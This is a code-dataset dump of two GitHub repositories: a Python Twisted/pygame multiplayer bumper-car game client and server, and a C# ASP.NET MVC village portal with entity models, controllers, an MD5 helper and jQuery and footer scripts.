0\n\t\t\t\t\n\t\t\t# get new messages from server and update player states\n\t\t\t\n\nclass GameLineReceiver(LineReceiver):\n def __init__(self,factory,gs):\n self.name = None\n\tself.factory = factory\n self.gs = gs\n self.state = \"ADDPLAYER\" \n\n def connectionMade(self):\n\tif self.state == \"ADDPLAYER\":\n self.handle_ADDPLAYER()\n else:\n self.handle_PLAY()\t\n\t\n def connectionLost(self,reason):\n\tprint \"connection lost. remove player from game\"\n\n def lineReceived(self, line):\n \tprint line\n\tline = line.strip().split(',')\n\tif line[0] == \"INPUT\":\n\t\tplaynum = int(line[1])\n\t\tkeyevent = int(line[2])\n\t\tkey = int(line[3])\n\t\tself.gs.keysheld[playnum][key] = -1 * (keyevent - 3) #1 if 2, 0 if 3\n\n def handle_ADDPLAYER(self):\n ## data received is used for creating a new player in the game\n ## set name\n if (len(self.gs.players) == 0):\n \tself.gs.players.append(Player(self.gs, len(self.gs.players), 50 + float(len(self.gs.players)) / 8.0 * 700, 300, 270))\n\t\tself.sendLine(str(len(self.gs.players) - 1))\n elif (len(self.gs.players) >= 1):\n \tself.gs.players.append(Player(self.gs, len(self.gs.players), 50 + float(len(self.gs.players)) / 8.0 * 700, 300, 270))\n\t\tself.sendLine(str(len(self.gs.players) - 1))\n \tself.state = \"PLAY\"\n \tthread.start_new_thread(self.gs.main, ())\n \n\tif (len(self.gs.players) >= 2):\n\t\tfor client in self.factory.clients:\n\t\t\tclient.sendLine(\"START\")\n\n def handle_PLAY(self):\n \tif (len(self.gs.players) >= 0 and len(self.gs.players) < 4):\n \tself.gs.players.append(Player(self.gs, len(self.gs.players), 50 + float(len(self.gs.players)) / 8.0 * 700, 300, 270))\n \tself.sendLine(str(len(self.gs.players) - 1))\n else:\n\t\tself.sendLine(\"-1\")\n\t\tself.sendLine(str(len(self.gs.players) - 1))\n\nclass GameFactory(Factory):\n def __init__(self):\n self.gs = GameSpace(self)\n\tself.clients = list()\n\n def buildProtocol(self,addr):\n\tself.clients.append(GameLineReceiver(self, self.gs))\n return self.clients[len(self.clients)-1]\n\nreactor.listenTCP(40077, GameFactory())\nreactor.run()\n\n" }, { "alpha_fraction": 0.6164318323135376, "alphanum_fraction": 0.6423935294151306, "avg_line_length": 30.42288589477539, "blob_id": "e7585ff46b5bab2d54e9bac7d89067222a1477db", "content_id": "d25dd3cc1acf77f172186770549d3bb8f700df26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6317, "license_type": "no_license", "max_line_length": 143, "num_lines": 201, "path": "/client.py", "repo_name": "vhawley/paradigms-final", "src_encoding": "UTF-8", "text": "from twisted.internet.protocol import Factory\nfrom twisted.internet.protocol import ClientFactory\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.internet import reactor\n\nimport sys\nimport os\nimport thread\n\nimport pygame\nfrom math import *\nfrom pygame.locals import *\n\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self, gs=None, number=0, x=0, y=0, angle=0):\n\t\tself.gs = gs\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.angle = angle\n\t\tself.maxhealth = 32.0\n\t\tself.health = self.maxhealth\n\t\tself.number = number\n\n\t\tself.baseimage = pygame.transform.scale(pygame.image.load(\"cars/\" + self.gs.cars[self.number]),(100,100))\n\t\tself.image = pygame.transform.rotate(self.baseimage, self.angle + 90)\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect = self.rect.move(x, y)\n\t\tself.rect = self.rect.move(self.rect.width / -2, self.rect.height / -2)\n\n\tdef tick(self):\n\t\tself.image = pygame.transform.rotate(self.baseimage, self.angle + 90)\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect = self.rect.move(self.x, self.y)\n\t\tself.rect = self.rect.move(self.rect.width / -2, self.rect.height / -2)\n\nclass Powerup:\n\tdef __init__(self, gs=None, number=0, x=0, y=0):\n\t\tself.gs = gs\n\t\tself.number = number\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.image = pygame.image.load(\"powerups/\" + self.gs.powerupimages[self.number])\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect = self.rect.move(x, y)\n\t\tself.rect = self.rect.move(self.rect.width / -2, self.rect.height / -2)\n\nclass GameSpace:\n\tdef __init__(self, lr, number):\n\t\tself.players = list()\n\t\tself.lr = lr\n\t\tself.playernumber = number\n\t\tself.cars = [\"ambulance.png\", \"audi.png\", \"blackviper.png\", \"car.png\", \"minitruck.png\", \"minivan.png\", \"police.png\", \"taxi.png\", \"truck.png\"]\n\t\tself.powerupimages = [\"doubledamage.png\", \"health.png\", \"invuln.png\", \"speed.png\"]\n\t\tself.powerups = list()\n\t\tself.gameover = 0\n\t\tself.winner = 0\n\t\t\n\tdef main(self):\n\t\t# 1) basic init\n\t\tpygame.init()\n\t\tpygame.mixer.init()\n\t\tself.sounds = list()\n\t\tfor i in range(1,5):\n\t\t\tself.sounds.append(pygame.mixer.Sound(\"sound/crash\" + str(i) + \".wav\"))\n\t\tself.debug = 0\n\t\tself.size = self.width, self.height = 1024, 768\n\n\t\tself.black = 0, 0, 0\n\n\t\tself.screen = pygame.display.set_mode(self.size)\n\n\t\tself.trackedinputs = [K_UP, K_DOWN, K_LEFT, K_RIGHT]\n\n\t\tself.keysheld = {}\n\t\tfor tinput in self.trackedinputs:\n\t\t\tself.keysheld[tinput] = 0\n\t\tself.tickrate = 60\n\t\n\t\t# 2) set up game objects\n\t\tself.clock = pygame.time.Clock()\n\t\t\n\n\t\t# 3) start game loop\n\t\twhile self.gameover == 0:\n\t\t\t# 4) regulate tick speed\n\t\t\tself.clock.tick(self.tickrate)\n\n\t\t\t# 5) handle user input events\n\t\t\tfor event in pygame.event.get():\n\t\t\t\t# send relevant player inputs to server for processing\n\t\t\t\tif (event.type == KEYDOWN) or (event.type == KEYUP):\n\t\t\t\t\tif (event.key in self.trackedinputs):\n\t\t\t\t\t\t# only relevant inputs need to be sent to server\n\t\t\t\t\t\tself.lr.sendLine(\"INPUT,\" + str(self.playernumber) + \",\" + str(event.type) + \",\" + str(event.key))\n\t\t\t\t\t\tif (event.type == KEYDOWN):\n\t\t\t\t\t\t\tself.keysheld[event.key] = 1\n\t\t\t\t\t\telif (event.type == KEYUP):\n\t\t\t\t\t\t\tself.keysheld[event.key] = 0\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit()\n\n\t\t\t# 6) ongoing behavior\n\t\t\tfor player in self.players:\n\t\t\t\tplayer.tick()\n\n\t\t\tself.screen.fill(self.black)\n\t\t\tfor player in self.players:\n\t\t\t\tif (player.health > 0):\n\t\t\t\t\tself.screen.blit(player.image, player.rect)\n\t\t\t\t\thealthpct = float(player.health) / player.maxhealth\n\t\t\t\t\thealthrect = Rect(player.x - 48, player.y - 48, healthpct * 97, 7)\n\t\t\t\t\thealthborder = Rect(player.x - 50, player.y - 50, 100, 10)\n\t\t\t\t\tif self.playernumber == player.number:\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(255,255,255), healthborder, 2)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(0,0,255), healthborder, 2)\n\t\t\t\t\tif (healthpct < 0.20):\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(255,0,0), healthrect, 0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpygame.draw.rect(self.screen,(0,255,0), healthrect, 0)\n\t\t\tfor powerup in self.powerups:\n\t\t\t\tself.screen.blit(powerup.image, powerup.rect)\n\n\t\t\tpygame.display.flip()\n\t\t\n\t\tself.screen.fill(self.black)\n\t\tfont = pygame.font.Font(None,36)\n\t\tif (self.winner == 1):\n\t\t\tendGameText = font.render(\"You won!\", 1 , (255,255,255))\n\t\telse:\n\t\t\tendGameText = font.render(\"You lose!\", 1 , (255,255,255))\n\t\ttextrect = endGameText.get_rect()\n\t\ttextrect.centerx = self.width / 2\n\t\ttextrect.centery = self.height / 2\n\t\tself.screen.blit(endGameText, textrect)\n\t\tpygame.display.flip()\n\t\twhile 1:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit()\n\n##################################################\n\nclass BumperClient(LineReceiver):\n\tdef __init__(self):\n\t\tself.state = \"WAITING\"\n\t\tself.playernumber = -1\n\t\tself.gs = None\n\tdef lineReceived(self, line):\n\t\tline = line.strip()\n\t\tif (self.state == \"WAITING\"):\n\t\t\tself.playernumber = int(line)\n\t\t\tif self.playernumber == -1:\n\t\t\t\tsys.exit(\"Game full. Exiting...\")\n\t\t\tself.state = \"READY\"\n\t\t\tself.gs = GameSpace(self, self.playernumber)\n\t\t\t\n\t\telif (self.state == \"READY\" and line == \"START\"):\n\t\t\tthread.start_new_thread(self.gs.main, ())\n\t\t\tself.state = \"PLAYING\"\n\t\telif (self.state == \"PLAYING\"):\n\t\t\tline = line.strip().split(',')\n\t\t\tif line[0] == \"PLAYER\":\n\t\t\t\tif (len(self.gs.players) <= int(line[1])):\n\t\t\t\t\tself.gs.players.append(Player(self.gs, int(line[1]), float(line[2]), float(line[3]), float(line[4])))\n\t\t\t\telse:\n\t\t\t\t\tself.gs.players[int(line[1])].x = float(line[2])\n\t\t\t\t\tself.gs.players[int(line[1])].y = float(line[3])\n\t\t\t\t\tself.gs.players[int(line[1])].angle = float(line[4])\n\t\t\t\tself.gs.players[int(line[1])].health = float(line[5])\n\t\t\t\tself.gs.players[int(line[1])].maxhealth = float(line[6])\n\t\t\telif line[0] == \"POWERUP\":\n\t\t\t\tprint line\n\t\t\t\tif line[1] == \"START\":\n\t\t\t\t\tself.gs.powerups = list()\n\t\t\t\telse:\n\t\t\t\t\tself.gs.powerups.append(Powerup(self.gs, int(line[1]), int(line[2]), int(line[3])))\n\t\t\telif line[0] == \"SOUND\":\n\t\t\t\tself.gs.sounds[int(line[1])-1].play()\n\t\t\telif line[0] == \"GAMEEND\":\n\t\t\t\tself.gs.gameover = 1\n\t\t\t\twinner = int(line[1])\n\t\t\t\tif winner == self.gs.playernumber:\n\t\t\t\t\tself.gs.winner = 1\n\t\t\t\t\t\n\t\telse:\n\t\t\tprint line\n\t\t\n\nclass BumperClientFactory(ClientFactory):\n\tdef buildProtocol(self, addr):\n\t\tnewconn = BumperClient()\n\t\treturn newconn\n\n##################################################\n\nmyfactory = BumperClientFactory()\n\nreactor.connectTCP('student00.cse.nd.edu', 40077, myfactory)\n\nreactor.run()\n\n" } ]
2
JasonLuoBetter/BeautifulCountryside
https://github.com/JasonLuoBetter/BeautifulCountryside
7b51dd0cc3a864f3391135c9f511e1a73c505cea
61d8f92aaa02412a61a4d2101c1bfac651203368
2ce7ba93a83a1101f4ecc3f33970187d890327ee
refs/heads/master
2020-03-06T18:28:39.798829
2018-03-27T15:40:31
2018-03-27T15:40:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6231405138969421, "alphanum_fraction": 0.6264463067054749, "avg_line_length": 22.269229888916016, "blob_id": "2a2290535eeec668ae872ed2d3f2e7ab7c1ed1bf", "content_id": "d2dc84fb5e622215f23cb0fc6b021c8e787c5e23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 605, "license_type": "no_license", "max_line_length": 55, "num_lines": 26, "path": "/GDKQ.Model/Vote_Main.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n public partial class Vote_Main\n {\n public int ID { get; set; }\n\n [StringLength(64)]\n public string Title { get; set; }\n\n public string Body { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public DateTime EndTime { get; set; }\n\n public bool IsDeleted { get; set; }\n\n public bool Enabled { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.584566593170166, "alphanum_fraction": 0.5951374173164368, "avg_line_length": 22.649999618530273, "blob_id": "bf95a1754137f22fb03bce19d2b473887a29e713", "content_id": "ab1c35fbd83631994789b19fb3bbf3c51b618a16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 946, "license_type": "no_license", "max_line_length": 55, "num_lines": 40, "path": "/GDKQ.Model/Villager.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Villager\")]\n public partial class Villager\n {\n public int ID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string UserName { get; set; }\n\n [Required]\n [StringLength(64)]\n public string Password { get; set; }\n\n [Required]\n [StringLength(64)]\n public string RealName { get; set; }\n\n [StringLength(64)]\n public string Mobile { get; set; }\n\n public DateTime? CreatTime { get; set; }\n\n public DateTime? LastLoginTime { get; set; }\n\n [StringLength(64)]\n public string LastLoginIP { get; set; }\n\n public bool Enabled { get; set; }\n\n public bool IsDeleted { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6096000075340271, "avg_line_length": 22.148147583007812, "blob_id": "7e7eb20eacf1bba3b5837ad5e6b5eeab7a024c0b", "content_id": "e455e425e4ee5568cf2f167de28c38d566137af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 625, "license_type": "no_license", "max_line_length": 55, "num_lines": 27, "path": "/GDKQ.Model/Category.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Category\")]\n public partial class Category\n {\n public int ID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string CaName { get; set; }\n\n [Required]\n [StringLength(64)]\n public string bh { get; set; }\n\n [StringLength(64)]\n public string pbh { get; set; }\n\n public DateTime CreateTime { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.5652841925621033, "alphanum_fraction": 0.5898617506027222, "avg_line_length": 25.040000915527344, "blob_id": "aa7b5245480a988d014cc8c47945fc3eb26c81e3", "content_id": "fdbc1ec8540885c767cdd1dfa1188db2b3d22acd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 659, "license_type": "no_license", "max_line_length": 106, "num_lines": 25, "path": "/Common/MD5.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Security.Cryptography;\nusing System.Text;\nusing System.Threading.Tasks;\n\nnamespace Common\n{\n public class MD5\n {\n /// <summary>\n /// 16位MD5加密\n /// </summary>\n /// <param name=\"password\"></param>\n /// <returns></returns>\n public static string MD5Encrypt16(string password)\n {\n var md5 = new MD5CryptoServiceProvider();\n string t2 = BitConverter.ToString(md5.ComputeHash(Encoding.Default.GetBytes(password)), 4, 8);\n t2 = t2.Replace(\"-\", \"\");\n return t2;\n }\n }\n}\n" }, { "alpha_fraction": 0.5297651290893555, "alphanum_fraction": 0.5417804718017578, "avg_line_length": 32.925926208496094, "blob_id": "1c9a581eaef9af0573c05a5f29b2284ccb17a112", "content_id": "74923b79ffbd3e0b665c6ebe39bb1f47d75c750e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1891, "license_type": "no_license", "max_line_length": 207, "num_lines": 54, "path": "/GDKQ.Web/Areas/BBS/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.BBS.Controllers\n{\n public class HomeController : Controller\n {\n public class viewModel\n {\n public List<Model.Article> Article01 { get; set; }//最新文章\n public List<Model.Article> Article04 { get; set; }//精华文章\n\n public viewModel(List<Model.Article> ArticleList01, List<Model.Article> ArticleList04)\n {\n this.Article01 = ArticleList01;\n this.Article04 = ArticleList04;\n }\n }\n /// <summary>\n /// 论坛首页\n /// </summary>\n /// <returns></returns>\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n var vm = new viewModel(\n dal.Article.Where(x => x.CategoryID == \"01\" && x.IsDeleted == true && x.Enable == true).OrderByDescending(x => x.CreateTime).Take(5).ToList<Model.Article>(),\n dal.Article.Where(x => x.CategoryID == \"04\" && x.IsDeleted == true && x.Enable == true).OrderByDescending(x=>x.like_count).OrderByDescending(x => x.CreateTime).Take(5).ToList<Model.Article>()\n );\n ViewBag.Title = \"论坛首页\";\n return View(vm);\n }\n\n\n\n [HttpPost]\n public ActionResult AddLike(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article a = dal.Article.SingleOrDefault(x => x.ID == id);\n if (a == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n a.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.4910096824169159, "alphanum_fraction": 0.4951590597629547, "avg_line_length": 28.324323654174805, "blob_id": "8251952aeb624300d37d09c394f5785a1b1e5c14", "content_id": "90acc986acaddc00ee7017a4641ad7d673917eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2313, "license_type": "no_license", "max_line_length": 143, "num_lines": 74, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n /// <summary>\n /// 新闻管理器(村务)\n /// </summary>\n public class NewsController : Controller\n {\n /// <summary>\n /// 新闻列表\n /// </summary>\n /// <param name=\"bh\">分类编号</param>\n /// <param name=\"pageindex\">当前页面页数</param>\n /// <returns></returns>\n public ActionResult List(string bh, int pageindex = 1)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n if (ca==null)\n {\n return Content(\"没有该分类的新闻\");\n }\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n total = dal.News.Count(x=>x.bh==ca.bh&&x.IsDeleted==true);\n if (total <1)\n {\n return Content(\"数据库中没有该新闻\");\n }\n \n List<Model.News> list0 = dal.News.Where(\n x=>x.bh==ca.bh && x.IsDeleted == true).OrderBy(a => a.ID).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n ViewBag.Title = ca.CaName;\n ViewBag.bh = ca.bh;\n \n return View(list);\n\n }\n\n\n /// <summary>\n /// 村务单页新闻(list下的)\n /// </summary>\n /// <param name=\"id\">新闻ID</param>\n /// <returns></returns>\n public ActionResult OnePage(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n = dal.News.SingleOrDefault(x => x.ID == id);\n if (n==null)\n {\n return Content(\"数据库中没有该新闻\");\n }\n n.VisitNum += 1;\n dal.SaveChanges();\n ViewBag.Title = n.CaName;\n return View(n);\n }\n\n public ActionResult Services()\n {\n ViewBag.Title = \"便民服务\";\n return View();\n }\n\n }\n}" }, { "alpha_fraction": 0.5843164324760437, "alphanum_fraction": 0.6079111695289612, "avg_line_length": 59, "blob_id": "d4d6c10f547a5f53fb69d35ebb5b55e107f76afd", "content_id": "19c3a58e7838ce103656c457903d7cac05da7f03", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1441, "license_type": "permissive", "max_line_length": 228, "num_lines": 24, "path": "/GDKQ.Web/Content/main/js/bg.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "var billType={payout:1,transferOut:2,borrow:3,borrowBack:4,income:5,lend:6,lendBack:7,transferIn:8,daifu:12};\nvar billManager={\n\taddType:billType.payout,realType:billType.payout,moreIsShow:false,typePos:new Array(-1,0,2,3,3,1,3,3),money2IsShow:false,showMore:function(){if(billManager.moreIsShow==true){this.closeMore()\n\t}else{\n\t\t$(\"#type-more\").addClass(\"btnshow\");$(\"#type-more-box\").show();billManager.moreIsShow=true}\n\t\t},closeMore:function(){\n\t\t\tif(billManager.moreIsShow==true)\n\t\t\t{$(\"#type-more-box\").hide();$(\"#type-more\").removeClass(\"btnshow\");billManager.moreIsShow=false}\n\t\t\t},moreButtonClick:function(type)\n\t\t\t{\n\t\t\t\t$(\"#tm-3,#tm-4,#tm-6,#tm-7,#tm-12,#tm-l-3,#tm-l-4,#tm-l-6,#tm-l-7,#tm-l-12\").remove();\n\t\t\t\t$(\"#type-menu-ul\").append('<li class=\"tm-l\" id=\"tm-l-'+type+'\"></li><li class=\"tm-n\" id=\"tm-'+type+'\"><a onclick=\"javascript:billManager.changeType('+type+');\"></a></li>');addMouseStyle($(\"#tm-\"+type+\" a\"),\"hover\",\"active\");\n\t\t\t\t$(\"#tm-\"+type+\" a\").click();\n\t\t\t\t},changeType:function(typeId){\n\t\t\t\t\tvar pos=$(\"#type-menu-ul .tm-n\").index($(\"#tm-\"+typeId));$(\"#type-menu li.tm-l\").removeClass(\"tm-l-no\");\n\t\t\t\t$(\"#type-menu li.tm-l\").eq(pos).addClass(\"tm-l-no\");if(pos>0)\n\t\t\t\t{\n\t\t\t\t\t$(\"#type-menu li.tm-l\").eq(pos-1).addClass(\"tm-l-no\")\n\t\t\t\t}$(\"#type-menu a\").removeClass(\"select\");$(\"#tm-\"+typeId+\" a\").addClass(\"select\");\n\t\t\t\t\t\n\t\t\t\t\t\t$(\"#tb-m .tb-ul-1\").hide();\n\t\t\t\t\t\t$(\"#tbul-\"+typeId).show();\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t\t\t};\n\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.6087257862091064, "avg_line_length": 59.125, "blob_id": "ff9b6569f43811d4a781bc6cb3bf155ee2b2cab7", "content_id": "1fb7006c66a849127a14dfb7a5a626b2f41b4941", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1444, "license_type": "permissive", "max_line_length": 228, "num_lines": 24, "path": "/GDKQ.Web/Content/main/js/bg1.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "var billType1={payout:1,transferOut:2,borrow:3,borrowBack:4,income:5,lend:6,lendBack:7,transferIn:8,daifu:12};\nvar billManager1={\n\taddType:billType1.payout,realType:billType1.payout,moreIsShow:false,typePos:new Array(-1,0,2,3,3,1,3,3),money2IsShow:false,showMore:function(){if(billManager1.moreIsShow==true){this.closeMore()\n\t}else{\n\t\t$(\"#type-more\").addClass(\"btnshow\");$(\"#type-more-box\").show();billManager1.moreIsShow=true}\n\t\t},closeMore:function(){\n\t\t\tif(billManager1.moreIsShow==true)\n\t\t\t{$(\"#type-more-box\").hide();$(\"#type-more\").removeClass(\"btnshow\");billManager1.moreIsShow=false}\n\t\t\t},moreButtonClick:function(type)\n\t\t\t{\n\t\t\t\t$(\"#tz-3,#tz-4,#tz-6,#tz-7,#tz-12,#tz-l-3,#tz-l-4,#tz-l-6,#tz-l-7,#tz-l-12\").remove();\n\t\t\t\t$(\"#tzls_box-ul\").append('<li class=\"tz-l\" id=\"tz-l-'+type+'\"></li><li class=\"tz-n\" id=\"tz-'+type+'\"><a onclick=\"javascript:billManager1.changeType('+type+');\"></a></li>');addMouseStyle($(\"#tz-\"+type+\" a\"),\"hover\",\"active\");\n\t\t\t\t$(\"#tz-\"+type+\" a\").click();\n\t\t\t\t},changeType:function(typeId){\n\t\t\t\t\tvar pos=$(\"#tzls_box-ul .tz-n\").index($(\"#tz-\"+typeId));$(\"#tzls_box li.tz-l\").removeClass(\"tz-l-no\");\n\t\t\t\t$(\"#tzls_box li.tz-l\").eq(pos).addClass(\"tz-l-no\");if(pos>0)\n\t\t\t\t{\n\t\t\t\t\t$(\"#tzls_box li.tz-l\").eq(pos-1).addClass(\"tz-l-no\")\n\t\t\t\t}$(\"#tzls_box a\").removeClass(\"select\");$(\"#tz-\"+typeId+\" a\").addClass(\"select\");\n\t\t\t\t\t\n\t\t\t\t\t\t$(\"#tz-m .tz-ul-1\").hide();\n\t\t\t\t\t\t$(\"#tzul-\"+typeId).show();\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t\t\t};\n\n" }, { "alpha_fraction": 0.5862952470779419, "alphanum_fraction": 0.6378481984138489, "avg_line_length": 62.75510025024414, "blob_id": "40457e045d1c055e92b6f1bd70663ced763c3206", "content_id": "1c3ec19fd6b1c3d3ab12484a9f98fd4ce99ee3d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3298, "license_type": "permissive", "max_line_length": 638, "num_lines": 49, "path": "/GDKQ.Web/Content/main/js/1507011715567555.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "document.writeln(\"<style type=\\'text/css\\'>\");\ndocument.writeln(\"<!-- \");\ndocument.writeln(\"a.db {\");\ndocument.writeln(\" FONT-FAMILY:\\'宋体\\';\");\ndocument.writeln(\"\tfont-size:12px;\");\ndocument.writeln(\"\ttext-decoration:none;\");\ndocument.writeln(\"\tcolor:#b4b4b4;\");\ndocument.writeln(\"}\");\ndocument.writeln(\"a.db:visited {\");\ndocument.writeln(\" FONT-FAMILY:\\'宋体\\';\");\ndocument.writeln(\"\tfont-size:12px;\");\ndocument.writeln(\"\ttext-decoration:none;\");\ndocument.writeln(\"\tcolor:#b4b4b4;\");\ndocument.writeln(\"}\");\ndocument.writeln(\"a.db:hover {\");\ndocument.writeln(\" FONT-FAMILY:\\'宋体\\';\");\ndocument.writeln(\"\tfont-size:12px;\");\ndocument.writeln(\"\ttext-decoration: underline;\");\ndocument.writeln(\"\tcolor:#fe4310;\");\ndocument.writeln(\"}\");\ndocument.writeln(\"-->\");\ndocument.writeln(\"</style>\");\ndocument.writeln(\"\");\ndocument.writeln(\"<table width=\\'100%\\' border=\\'0\\' cellspacing=\\'0\\' cellpadding=\\'0\\' bgcolor=\\'#545454\\' height=\\'127\\'>\");\ndocument.writeln(\" <tr>\");\ndocument.writeln(\" <td> </td>\");\ndocument.writeln(\" <td width=\\'100%\\'>\");\ndocument.writeln(\" \t<table width=\\'1000\\' border=\\'0\\' cellspacing=\\'0\\' cellpadding=\\'0\\' align=\\'center\\'>\");\ndocument.writeln(\" <tr>\");\ndocument.writeln(\" <td width=\\'50\\' align=\\'center\\'></td> \");\ndocument.writeln(\"<td width=\\'100\\' align=\\'center\\'><table width=\\'100%\\' border=\\'00\\' cellspacing=\\'0\\' cellpadding=\\'0\\'>\");\ndocument.writeln(\" <tr>\");\ndocument.writeln(\" <td><script id=\\'_jiucuo_\\' sitecode=\\'3310000002\\' src=\\'http://pucha.kaipuyun.cn/exposure/jiucuo.js\\'></script></td>\");\ndocument.writeln(\" </tr>\");\ndocument.writeln(\"</table></td>\");\ndocument.writeln(\" <td width=\\'80\\'><div align=\\'center\\'><iframe src=\\'/col/col22261/index.html\\' frameborder=\\'0\\' style=\\'width:80px;height:80px;\\' scrolling=\\'no\\'></iframe></div></td>\");\ndocument.writeln(\" <td width=\\'15\\'> </td>\");\ndocument.writeln(\" <td width=\\'683\\' align=\\'left\\' valign=\\'top\\' style=\\'color:#b4b4b4; font-size:12px; line-height:26px;\\'><a href=\\'http://www.zjtz.gov.cn/col/col2889/index.html\\' class=\\'db\\'>网站声明</a> | <a href=\\'http://www.zjtz.gov.cn/col/col2892/index.html\\' class=\\'db\\'>联系我们</a> | <a href=\\'http://www.zjtz.gov.cn/col/col2893/index.html\\' class=\\'db\\'>隐私安全</a> | <a href=\\'http://www.zjtz.gov.cn/col/col2894/index.html\\' class=\\'db\\'>免责声明</a> | <a href=\\'http://www.zjtz.gov.cn/col/col3743/index.html\\' class=\\'db\\'>访问统计</a> | <a href=\\'http://mail.zjtz.gov.cn/login.html\\' target=\\'_blank\\' class=\\'db\\'>邮箱登陆</a>\");\ndocument.writeln(\"<br>\");\ndocument.writeln(\"主办:中共台州市委 台州市人民政府 承办:台州市委市政府信息中心 E_mail:[email protected] 浙ICP备09021086号-2 <br><a class=\\'db\\' target=\\'_blank\\' href=\\'http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=33100202000542\\'>浙公网安备33100202000542号</a>\");\ndocument.writeln(\"\");\ndocument.writeln(\"<br>建议使用IE8.0以上浏览器浏览 1024×768分辨率 2003-2010 版权所有\t\t\t</td> \");\ndocument.writeln(\" </tr>\");\ndocument.writeln(\" </table>\");\ndocument.writeln(\"\");\ndocument.writeln(\" </td>\");\ndocument.writeln(\" <td> </td>\");\ndocument.writeln(\" </tr>\");\ndocument.writeln(\"</table>\");" }, { "alpha_fraction": 0.5220694541931152, "alphanum_fraction": 0.5265918970108032, "avg_line_length": 33.12963104248047, "blob_id": "4cfc0c1bda6bcf6c78eb4e7d22a2cbd38aca59f3", "content_id": "247c36abc587d1933d519c423c83defacc847693", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 5788, "license_type": "no_license", "max_line_length": 141, "num_lines": 162, 